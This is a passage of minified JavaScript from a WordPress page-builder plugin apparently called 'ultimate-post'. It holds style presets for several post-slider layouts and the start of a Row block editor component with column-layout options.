Spacing:{lg:6,unit:"px",ulg:"px"},metaSeparator:"emptyspace",metaDateFormat:"j M Y",metaAuthorPrefix:"",contenWraptWidth:{lg:"100",unit:"%",ulg:"%"},metaColor:"#FFFFFFA8",metaSeparator:"dot",metaSpacing:{lg:"13",unit:"px",ulg:"px"},catRadius:{lg:"0",unit:"px"},catBgColor:{color:"",openColor:1,type:"color"},catBgHoverColor:{color:"",openColor:1,type:"color"},catTypo:{decoration:"none",family:"",height:{lg:"15",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"300",transform:"uppercase",spacing:{lg:"7.32",unit:"px"}},dotWidth:{lg:"5",unit:"px"},dotHeight:{lg:"5",unit:"px"},dotHoverWidth:{lg:"8",unit:"px"},dotHoverHeight:{lg:"8",unit:"px"},dotVartical:{lg:"-20",unit:"px"},dotBg:"#9b9b9b",dotHoverBg:"#9b9b9b",dotRadius:{lg:{top:"30",bottom:"30",left:"30",right:"30",unit:"px"}},dotHoverRadius:{lg:{top:"30",bottom:"30",left:"30",right:"30",unit:"px"}},arrowBg:"",arrowHoverBg:"",arrowColor:"#000",arrowHoverColor:"#000",arrowSize:{lg:"80",unit:"px"},arrowVartical:{lg:"45",sm:"16",xs:"0",unit:"px"},arrowStyle:"leftAngle2#rightAngle2",arrowBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(255,255,255,1)",openBorder:1},arrowHoverBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(67,67,67,1)",openBorder:1},wrapMargin:{lg:{top:"",bottom:"50",unit:"px",left:"",right:""}}},slide2:{autoPlay:!0,fade:!0,slidesToShow:{lg:"1",sm:"1",xs:"1"},excerptShow:!0,readMore:!0,imgOverlay:!1,sliderGap:0,height:{lg:550,unit:"px"},imgWidth:{xs:"20",ulg:"%",unit:"%"},contenWraptWidth:{lg:71,unit:"%",ulg:"%",usm:"%",sm:100,xs:100},contentWrapBg:"#644737",contentWrapHoverBg:"#644737",contentAlign:"left",contenWraptHeight:{lg:"100",ulg:"%"},contentWrapRadius:{lg:"0"},contentWrapHoverRadius:{lg:"0"},contentVerticalPosition:"middlePosition",contentWrapPadding:{lg:{top:"0",bottom:"0",left:"60",right:"30",unit:"px"},xs:{top:"24",bottom:"24",left:"24",right:"24",unit:"px"}},titleLength:"12",titleColor:"#fff",titleHoverColor:"#fff6",titleTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"28",xs:"22",unit:"px"},weight:"400"},titlePadding:{lg:{top:"15",bottom:"5",unit:"px"}},metaColor:"#FFFFFFA8",metaHoverColor:"#a5a5a5",metaTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"16",unit:"px"},weight:"300"},catTypo:{decoration:"none",height:{lg:"12",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},spacing:{lg:"",unit:"px"},weight:"300",transform:""},excerptColor:"#d7d7d8d8",excerptTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"16",unit:"px"},weight:"300",transform:""},catRadius:{lg:"0",unit:"px"},catBgColor:{color:"#ffffff21",openColor:1,type:"color"},catBgHoverColor:{color:"#ffffff21",openColor:1,type:"color"},readMoreColor:"#fff",readMoreHoverColor:"#fff7",readMoreTypo:{decoration:"none",family:"",height:{lg:"12",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"300",transform:"uppercase"},dotBg:"#644737",dotHoverBg:"#644737",dotWidth:{lg:"6",unit:"px"},dotHeight:{lg:"6",unit:"px"},dotHoverWidth:{lg:"10",unit:"px"},dotHoverHeight:{lg:"10",unit:"px"},dotVartical:{lg:"-27",unit:"px"},dotRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},dotHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},metaSeparator:"dot",metaSpacing:{lg:"13",unit:"px",ulg:"px"},arrowBg:"#503a2d",arrowHoverBg:"#614F44",arrowColor:"#fff",arrowHoverColor:"#fff",arrowWidth:{lg:"40",unit:"px"},arrowHeight:{lg:"40",unit:"px"},arrowSize:{lg:"20",unit:"px"},arrowVartical:{lg:"0",ulg:"px"},arrowRadius:{lg:"0",ulg:"px"},arrowHoverRadius:{lg:"0",ulg:"px"},arrowStyle:"leftAngle2#rightAngle2",arrowBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(255,255,255,1)",openBorder:1},arrowHoverBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(67,67,67,1)",openBorder:1},wrapMargin:{lg:{top:"",bottom:"50",unit:"px",left:"",right:""}}},slide3:{autoPlay:!0,excerptShow:!1,readMore:!1,height:{lg:550,unit:"px"},contentAlign:"center",imgHeight:{lg:50,unit:"%"},slidesToShow:{lg:"3",sm:"2",xs:"1"},fade:!1,sliderGap:"10",dots:!1,layout:"slide3",imgRadius:{lg:{top:"10",right:"10",bottom:"",left:"",unit:"px"},unit:"px"},imgOverlay:!1,contentWrapBg:"rgba(241,241,241,1)",contentWrapHoverBg:"",contenWraptHeight:{lg:45,unit:"%"},contentWrapHoverRadius:{lg:{top:"",bottom:"10",left:"10",right:"",unit:"px"}},contentWrapRadius:{lg:{top:"",bottom:"10",left:"10",right:"",unit:"px"}},contentWrapHoverRadius:{lg:{top:"",bottom:"10",left:"10",right:"",unit:"px"}},contentWrapPadding:{lg:{top:"16",bottom:"32",left:"16",right:"16",unit:"px"}},titleLength:"8",titleColor:"rgba(22,22,22,1)",titleHoverColor:"rgba(22,22,22, .4)",titleTypo:{openTypography:1,size:{lg:"22",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700",transform:"capitalize"},arrowStyle:"leftArrowLg#rightArrowLg",arrowWidth:{lg:"56",unit:"px"},arrowHeight:{lg:"56",unit:"px"},arrowSize:{lg:"27",nit:"px",ulg:"px"},arrowVartical:{lg:"-32",unit:"px",ulg:"px"},arrowColor:"rgba(255,255,255,1)",arrowHoverColor:"rgba(67,67,67,1)",arrowBg:"rgba(67,67,67,1)",arrowHoverBg:"rgba(255,255,255,1)",arrowBorder:{width:{top:"2",right:"2",bottom:"2",left:"2",unit:"px"},type:"solid",color:"rgba(255,255,255,1)",openBorder:1},arrowHoverBorder:{width:{top:"2",right:"2",bottom:"2",left:"2",unit:"px"},type:"solid",color:"rgba(67,67,67,1)",openBorder:1},arrowRadius:{lg:{top:"51",bottom:"51",left:"51",right:"51",unit:"px"}},arrowHoverRadius:{lg:{top:"51",bottom:"51",left:"51",right:"51",unit:"px"}},catSacing:{lg:{top:"5",bottom:"10",left:"",right:"",unit:"px"}},catPadding:{lg:{top:"4",bottom:"4",left:"9",right:"9",unit:"px"}},catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"400",decoration:"none",family:""},catBgColor:{openColor:1,type:"color",color:"rgba(97,59,255,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:1,type:"color",color:"rgba(97,59,255,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},metaSeparator:"verticalbar",metaColor:"rgba(118,118,118,1)",metaHoverColor:"rgba(97,59,255,1)",metaSpacing:{lg:"10",unit:"px",ulg:"px"},metaTypo:{openTypography:1,size:{lg:"11",unit:"px"},height:{lg:"",unit:"px"},weight:"400",decoration:"none",family:"",transform:"uppercase"},wrapMargin:{lg:{top:"",bottom:"0",unit:"px",left:"30",right:"30"}}},slide4:{autoPlay:!0,sliderGap:0,excerptShow:!0,readMore:!1,layout:"slide4",contentAlign:"left",centerItemScale:{lg:"1.08"},slidesToShow:{lg:"1",sm:"1",xs:"1"},height:{lg:500,unit:"px",ulg:"px"},slidesCenterPadding:{lg:"180",xs:"30"},slidesTopPadding:"20",slideBgBlur:"",contentWrapBg:"",contentWrapHoverBg:"",contentWrapRadius:{lg:"0"},contentWrapHoverRadius:{lg:"0"},contenWraptHeight:{lg:"",ulg:"%"},contenWraptWidth:{lg:"100",unit:"%",ulg:"%"},contentWrapPadding:{lg:{top:"",bottom:"50",left:"35",right:"35",unit:"px"}},titleLength:"9",titleColor:"#fff",titleHoverColor:"#a5a5a5",titlePadding:{lg:{top:"15",bottom:"5",unit:"px"}},titleTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"32",xs:"22",unit:"px"},weight:"700",style:"italic"},arrowSize:{lg:"31",unit:"px",ulg:"px"},arrowWidth:{lg:"40",unit:"px"},arrowHeight:{lg:"80",unit:"px",ulg:"px"},arrowVartical:{lg:"100",sm:"24",xs:"16",ulg:"px",usm:"px",uxs:"px"},arrowColor:"#fff",arrowHoverColor:"#fff",arrowBg:"rgba(44,44,44,0.7)",arrowHoverBg:"#503a2d",arrowBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(255,255,255,1)",openBorder:1},arrowHoverBorder:{width:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},type:"solid",color:"rgba(67,67,67,1)",openBorder:1},arrowRadius:{lg:"0",ulg:"px"},arrowHoverRadius:{lg:"0",ulg:"px"},dotWidth:{lg:"15",unit:"px"},dotHeight:{lg:"2",unit:"px",ulg:"px"},dotHoverWidth:{lg:"22",unit:"px"},dotHoverHeight:{lg:"3",unit:"px",ulg:"px"},dotVartical:{lg:"15",unit:"px",ulg:"px"},dotBg:"rgba(255,255,255,1)",dotHoverBg:"rgba(255,255,255,1)",dotRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},dotHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},catTypo:{decoration:"none",height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"400",transform:"uppercase"},catColor:"rgba(96,96,96,1)",catHoverColor:"#a5a5a5",catBgColor:{openColor:1,type:"color",color:"rgba(255,255,255,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:1,type:"color",color:"rgba(255,255,255,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catRadius:{lg:"0",unit:"px"},catSacing:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},catPadding:{lg:{top:"5",bottom:"5",left:"8",right:"8",unit:"px"}},imgOverlay:!0,imgOverlayType:"custom",overlayColor:{openColor:1,type:"gradient",color:"#0e1523",gradient:"linear-gradient(0deg,rgb(0,0,0) 0%,rgba(7,7,7,0) 100%)",clip:!1},imgOpacity:"0.61",imgHeight:{lg:"255",ulg:"px"},imgRadius:{lg:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"},unit:"px"},readMoreTypo:{decoration:"none",family:"",height:{lg:"12",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"300",transform:"uppercase"},readMoreColor:"#fff",readMoreHoverColor:"#a5a5a5",metaSeparator:"slash",metaAuthorPrefix:"By",metaTypo:{decoration:"none",height:{lg:"",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"400"},metaColor:"rgba(255,255,255,1)",metaHoverColor:"#a5a5a5",metaSpacing:{lg:"6",unit:"px",ulg:"px"},excerptLimit:"23",excerptColor:"rgba(255,255,255,0.61)",excerptTypo:{decoration:"none",height:{lg:"28",xs:"16",unit:"px"},openTypography:1,size:{lg:"16",unit:"px"},weight:"400",transform:""},excerptPadding:{lg:{top:"10",bottom:"10",unit:"px"}},wrapRadius:{lg:{top:"23",right:"23",bottom:"23",left:"23",unit:"px"},unit:"px"},wrapMargin:{lg:{top:"",bottom:"",unit:"px",left:"",right:""}}},slide5:{fade:!0,autoPlay:!0,readMore:!1,excerptShow:!1,imgOverlay:!1,slideBgBlur:"6",contentAlign:"left",slidesToShow:{lg:"1",sm:"1",xs:"1"},layout:"slide5",imgWidth:{lg:"75",ulg:"%"},contentHorizontalPosition:"leftPosition",contentVerticalPosition:"bottomPosition",contenWraptWidth:{lg:"57",xs:"100",unit:"%",ulg:"%",uxs:"%"},contentWrapBg:"rgba(255,255,255,0.75)",contentWrapHoverBg:"rgba(255,255,255,0.75)",contentWrapRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapPadding:{lg:{top:"20",bottom:"20",left:"24",right:"24",unit:"px"}},slideWrapMargin:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},titleColor:"rgba(40,74,0,1)",titleHoverColor:"rgba(40,74,0, .6)",titleTypo:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:"700",transform:"capitalize"},titlePadding:{lg:{top:"10",bottom:"0",unit:"px"}},titleLength:"5",arrowPos:"right",arrowSize:{lg:"20",unit:"px",ulg:"px"},arrowWidth:{lg:"38",unit:"px",ulg:"px"},arrowHeight:{lg:"38",unit:"px",ulg:"px"},arrowVartical:{lg:"278",unit:"px",ulg:"px"},prevArrowPos:{lg:"62",unit:"px"},nextArrowPos:{lg:"21",unit:"px"},arrowColor:"#284a00",arrowHoverColor:"#284a00",arrowBg:"rgba(255,255,255,1)",arrowHoverBg:"#e2e2e2",arrowRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},arrowHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},dotWidth:{lg:"6",unit:"px"},dotHeight:{lg:"6",unit:"px",ulg:"px"},dotHoverWidth:{lg:"10",unit:"px"},dotHoverHeight:{lg:"10",unit:"px",ulg:"px"},dotSpace:{lg:"4",unit:"px",ulg:"px"},dotVartical:{lg:"109",xs:"200",unit:"px",ulg:"px",uxs:"px"},dotHorizontal:{lg:"0",ulg:"px"},dotBg:"rgba(255,255,255,1)",dotHoverBg:"rgba(117,137,78,1)",catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"500",decoration:"none",family:""},catColor:"rgba(40,74,0,1)",catHoverColor:"rgba(40,74,0,.5)",catBgColor:{openColor:1,type:"color",color:"rgba(222,197,93,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:1,type:"color",color:"rgba(222,197,93,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catSacing:{lg:{top:0,bottom:"5",left:0,right:0,unit:"px"}},catPadding:{lg:{top:"4",bottom:"4",left:"8",right:"8",unit:"px"}},metaList:'["metaDate"]',metaTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},weight:"400",decoration:"none",family:""},metaColor:"rgba(40,74,0,1)",metaHoverColor:"rgba(40,74,0,.5)",metaMargin:{lg:{top:"15",bottom:"",left:"",right:"",unit:"px"}},metaPadding:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},slide6:{autoPlay:!0,dots:!1,fade:!1,imgOverlay:!1,excerptShow:!1,readMore:!1,layout:"slide6",height:{lg:480,unit:"px",ulg:"px"},contentVerticalPosition:"middlePosition",contentHorizontalPosition:"rightPosition",contentAlign:"left",contenWraptWidth:{lg:"482",sm:"70",unit:"%",ulg:"px",uxs:"%",xs:"90",usm:"%"},contenWraptHeight:{lg:"288",ulg:"px",uxs:"px",xs:"250",usm:"%",sm:""},contentWrapBg:"rgba(255,255,255,1)",contentWrapHoverBg:"rgba(255,255,255,1)",contentWrapBorder:{width:{top:1,right:1,bottom:1,left:1},type:"solid",color:"rgba(112,112,112,1)",openBorder:0},contentWrapRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapPadding:{lg:{top:"35",bottom:"0",left:"35",right:"35",unit:"px"},xs:{top:"16",right:"16",bottom:"16",left:"16",unit:"px"}},contentWrapBorder:{width:{top:"1",right:"1",bottom:"1",left:"1",unit:"px"},type:"solid",color:"#707070",openBorder:1},slideWrapMargin:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},titleColor:"rgba(60,60,60,1)",titleHoverColor:"rgba(151,148,148,1)",titleTypo:{openTypography:1,size:{lg:"26",xs:"20",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"500",transform:""},titlePadding:{lg:{top:"20",bottom:"12",unit:"px",right:"0",left:"0"}},titleLength:"10",arrowSize:{lg:"25",unit:"px",ulg:"px"},arrowWidth:{lg:"52",unit:"px",ulg:"px"},arrowHeight:{lg:"52",unit:"px",ulg:"px"},arrowPos:"right",arrowVartical:{lg:"358",unit:"px",ulg:"px",uxs:"px",xs:"55"},prevArrowPos:{lg:"429",unit:"px",xs:"53",xs:""},nextArrowPos:{lg:"377",unit:"px",xs:"0",xs:""},arrowColor:"rgba(255,255,255,1)",arrowHoverColor:"",arrowBg:"#9f9f9f",arrowHoverBg:"#848484",arrowRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},arrowHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},catColor:"rgba(121,175,167,1)",catHoverColor:"rgba(121,176,168,0.5)",catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},transform:"capitalize",weight:"300",decoration:"none",family:""},catBgColor:{openColor:0,type:"openColor",color:"",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:0,type:"openColor",color:"#037fff",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catPadding:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},imgHeight:{lg:"100",ulg:"%",xs:"200",ulg:"%",uxs:"px"},imgWidth:{lg:"70",ulg:"%",uxs:"%",xs:"100"},metaStyle:"style3",metaSeparator:"dot",metaColor:"rgba(112,112,112,1)",metaHoverColor:"rgba(1,1,1,1)",metaSpacing:{lg:"12",unit:"px",ulg:"px"},metaTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},weight:"400",decoration:"none",family:""},wrapBg:{openColor:0,type:"color",color:"rgba(237,237,237,1)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},wrapOuterPadding:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}}},slide7:{autoPlay:!0,fade:!1,dots:!1,excerptShow:!1,sliderGap:"0",layout:"slide7",slideBgBlur:0,llItemScale:{lg:"0.93"},centerItemScale:{lg:"0.99"},height:{lg:"439",unit:"px"},slidesCenterPadding:{lg:"213",sm:"100",xs:"0",unit:"px"},contentWrapBg:"",contentWrapHoverBg:"",contentVerticalPosition:"middlePosition",contenWraptWidth:{lg:"",unit:"%",ulg:"%"},contentWrapPadding:{lg:{top:"",bottom:"",left:"24",right:"24",unit:"px"}},contentWrapRadius:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},contentWrapHoverRadius:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},slideWrapMargin:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},titleColor:"rgba(255,255,255,1)",titleHoverColor:"rgba(202,202,202,1)",titleTypo:{openTypography:1,size:{lg:"24",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"700",transform:"capitalize"},titlePadding:{lg:{top:"10",bottom:"10",unit:"px",right:"20",left:"20"}},arrowSize:{lg:"22",unit:"px",ulg:"px"},arrowWidth:{lg:"49",unit:"px",ulg:"px"},arrowHeight:{lg:"49",unit:"px",ulg:"px"},arrowVartical:{lg:"229",unit:"px"},arrowBg:"rgba(255,255,255,1)",arrowHoverBg:"rgba(255,255,255,1)",arrowRadius:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},arrowHoverRadius:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},arrowShadow:{inset:"",width:{top:"5",right:"6",bottom:"31",left:"0",unit:"px"},color:"rgba(0,0,0,0.32)",openShadow:1},catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"3.6",unit:"px"},transform:"uppercase",weight:"500",decoration:"none",family:""},prevArrowPos:{lg:"200",sm:"80",xs:"0",unit:"px"},nextArrowPos:{lg:"200",sm:"80",xs:"0",unit:"px"},catColor:"rgba(255,255,255,1)",catHoverColor:"rgba(255,255,255, .5)",catHoverColor:"rgba(207,207,207,1)",catBgColor:{openColor:0,type:"openColor",color:"#000",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:0,type:"openColor",color:"#037fff",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},imgOverlay:!0,imgOverlayType:"custom",overlayColor:{openColor:1,type:"gradient",color:"#0e1523",gradient:"linear-gradient(359deg,rgb(0,0,0) 34%,rgba(30,30,30,0.64) 99%)",clip:!1},imgOpacity:"0.55",imgGrayScale:{lg:"0",unit:"%",ulg:"%"},imgRadius:{lg:{top:"24",right:"24",bottom:"24",left:"24",unit:"px"},unit:"px"},metaList:'["metaAuthor","metaView"]',metaStyle:"icon",metaSeparator:"dash",metaTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"20",unit:"px"},weight:"400",decoration:"none",family:""},metaColor:"rgba(255,255,255,1)",metaSpacing:{lg:"15",unit:"px",ulg:"px"},metaMargin:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}}},slide8:{autoPlay:!0,slideBgBlur:4,layout:"slide8",excerptShow:!1,readMore:!1,imgOverlay:!1,contentWrapBg:"#00000059",contentWrapHoverBg:"#00000059",contentAlign:"left",contentWrapRadius:{lg:"0"},contentWrapHoverRadius:{lg:"0"},contentHorizontalPosition:"leftPosition",contenWraptHeight:{lg:335,ulg:"px",usm:"%"},contenWraptWidth:{lg:742,unit:"%",ulg:"px",usm:"%",sm:100},contentWrapRadiu:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},contentWrapPadding:{lg:{top:"67",bottom:"21",left:"67",right:"67",unit:"px"},xs:{top:"30",right:"16",bottom:"16",left:"16",unit:"px"}},slideWrapMargin:{lg:{top:"",bottom:"",left:"165",right:"",unit:"px"},sm:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"}},titleHoverColor:"rgba(141,141,141,1)",titleTypo:{openTypography:1,size:{lg:"38",xs:"25",unit:"px"},height:{lg:"1.3",xs:"34",ulg:"rem",uxs:"px"},decoration:"none",family:"",weight:"600",transform:"capitalize"},titlePadding:{lg:{top:"10",bottom:"10",unit:"px"}},titleLength:"9",arrowSize:{lg:"21",unit:"px",ulg:"px"},arrowWidth:{lg:"50",unit:"px",ulg:"px"},arrowHeight:{lg:"50",unit:"px",ulg:"px"},arrowVartical:{lg:"190",xs:"190",unit:"px"},prevArrowPos:{lg:"165",unit:"px",sm:"0"},nextArrowPos:{lg:"218",unit:"px",sm:"55"},arrowColor:"rgba(255,255,255,1)",arrowHoverColor:"rgba(255,255,255,1)",arrowBg:"rgba(56,56,56,1)",arrowHoverBg:"rgba(0,0,0,1)",arrowRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},arrowHoverRadius:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},dotWidth:{lg:"4",unit:"px"},dotHeight:{lg:"4",unit:"px",ulg:"px"},dotHoverWidth:{lg:"8",unit:"px"},dotHoverHeight:{lg:"8",unit:"px",ulg:"px"},dotVartical:{lg:"21",unit:"px",ulg:"px"},dotBg:"rgba(255,255,255,1)",dotHoverBg:"rgba(255,255,255,1)",catTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"7.8",unit:"px"},transform:"uppercase",weight:"400",decoration:"none",family:""},catBgColor:{openColor:1,type:"color",color:"rgba(255,255,255,0.29)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catBgHoverColor:{openColor:1,type:"color",color:"rgba(255,255,255,0.29)",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},catRadius:{lg:{0:"2",top:"0",right:"0",bottom:"0",left:"0",unit:"px"},unit:"px"},catSacing:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},catPadding:{lg:{top:"8",bottom:"8",left:"10",right:"10",unit:"px"}},metaSeparator:"dash",metaTypo:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:20,unit:"px"},weight:"300",decoration:"none",family:""},metaColor:"rgba(255,255,255,1)",metaSpacing:{lg:"14",unit:"px",ulg:"px"}}}},66187:(e,t,l)=>{"use strict";l.d(t,{Z:()=>S});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(59902),s=l(92637),p=l(55040),c=l(74661),u=l(20498);const{__}=wp.i18n,{InspectorControls:d,InnerBlocks:m}=wp.blockEditor,{Fragment:g,useEffect:y}=wp.element,{Tooltip:b}=wp.components,{serialize:v,parse:h}=wp.blocks,{getBlocksByClientId:f}=wp.data.select("core/block-editor"),{removeBlocks:k,updateBlockAttributes:w,insertBlocks:x}=wp.data.dispatch("core/block-editor"),{getBlockAttributes:T,getBlockRootClientId:_}=wp.data.select("core/block-editor"),C=[{lg:[100],sm:[100],xs:[100]},{lg:[50,50],sm:[50,50],xs:[100,100]},{lg:[70,30],sm:[50,50],xs:[100,100]},{lg:[30,70],sm:[50,50],xs:[100,100]},{lg:[33.33,33.33,33.34],sm:[33.33,33.33,33.34],xs:[100,100,100]},{lg:[25,25,50],sm:[25,25,50],xs:[100,100,100]},{lg:[50,25,25],sm:[50,25,25],xs:[100,100,100]},{lg:[25,25,25,25],sm:[50,50,50,50],xs:[100,100,100,100]},{lg:[20,20,20,20,20],sm:[20,20,20,20,20],xs:[100,100,100,100,100]},{lg:[16.66,16.66,16.66,16.66,16.66,16.7],sm:[16.66,16.66,16.66,16.66,16.66,16.7],xs:[100,100,100,100,100,100]}],E=[{lg:[100],sm:[100],xs:[100]},{lg:[50,50],sm:[50,50],xs:[100,100]},{lg:[33.33,33.33,33.34],sm:[33.33,33.33,33.34],xs:[100,100,100]},{lg:[25,25,25,25],sm:[50,50,50,50],xs:[100,100,100,100]},{lg:[20,20,20,20,20],sm:[20,20,20,20,20],xs:[100,100,100,100,100]},{lg:[16.66,16.66,16.66,16.66,16.66,16.7],sm:[16.66,16.66,16.66,16.66,16.66,16.7],xs:[100,100,100,100,100,100]}];function S(e){const{isSelected:t,setAttributes:l,name:S,attributes:P,clientId:L,className:I,toggleSelection:B}=e,{blockId:U,currentPostId:M,advanceId:A,HtmlTag:H,rowBtmShape:N,rowTopShape:j,rowBgImg:Z,rowOverlayBgImg:O,layout:R,rowTopGradientColor:D,rowBtmGradientColor:z,rowWrapPadding:F,align:W,previewImg:V}=P;y((()=>{const e=L.substr(0,6),t=T(_(L));(0,i.qi)(l,t,M,L),U?U&&U!=e&&(t?.hasOwnProperty("ref")||(0,i.k0)()||t?.hasOwnProperty("theme")||l({blockId:e})):l({blockId:e})}),[L]);const G={setAttributes:l,name:S,attributes:P,clientId:L},[q]=(0,r.Z)();let $;if(U&&($=(0,n.Kh)(P,"ultimate-post/row",U,(0,i.k0)())),V&&!t)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:V});y((()=>{t&&V&&l({previewImg:""})}),[e?.isSelected]);const K=F[q]?.unit?F[q]?.unit:"px";if(!Object.keys(R).length)return(0,a.createElement)("div",{className:"ultp-column-structure"},(0,a.createElement)("div",{className:"ultp-column-structure__heading"},"Chose a Layout"),(0,a.createElement)("div",{className:"ultp-column-structure__content"},C.map(((e,t)=>(0,a.createElement)(b,{key:t,delay:0,visible:!0,placement:"bottom",text:`${e.lg.join(" : ")}`},(0,a.createElement)("div",{onClick:()=>l({layout:e})},e.lg.map(((e,t)=>(0,a.createElement)("div",{key:t,style:{width:`calc(${e}% - 15px)`}})))))))));const J=Z?.openColor?" ultpBgPadding"+(F?.lg?.left?"":" lgL")+(F?.lg?.right?"":" lgR")+(F?.sm?.left?"":" smL")+(F?.sm?.right?"":" smR")+(F?.xs?.left?"":" xsL")+(F?.xs?.right?"":" xsR"):"",Y=(e,t,o)=>{const a=Object.assign({},F[q],{[o]:e+parseInt(t)});l({rowWrapPadding:Object.assign({},F,{[q]:a})})};return(0,a.createElement)(g,null,(0,a.createElement)(d,null,(0,a.createElement)(s.Sections,null,(0,a.createElement)(s.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,a.createElement)("div",{className:"ultp-field-wrap ultp-field-tag ultp-row-control ultp-label-space"},(0,a.createElement)("label",{className:"ultp-field-label"},__("Row Column","ultimate-post")),(0,a.createElement)("div",{className:"ultp-sub-field"},E.map(((e,t)=>(0,a.createElement)("span",{key:t,className:"ultp-tag-button"+(e.lg.length==R.lg.length?" 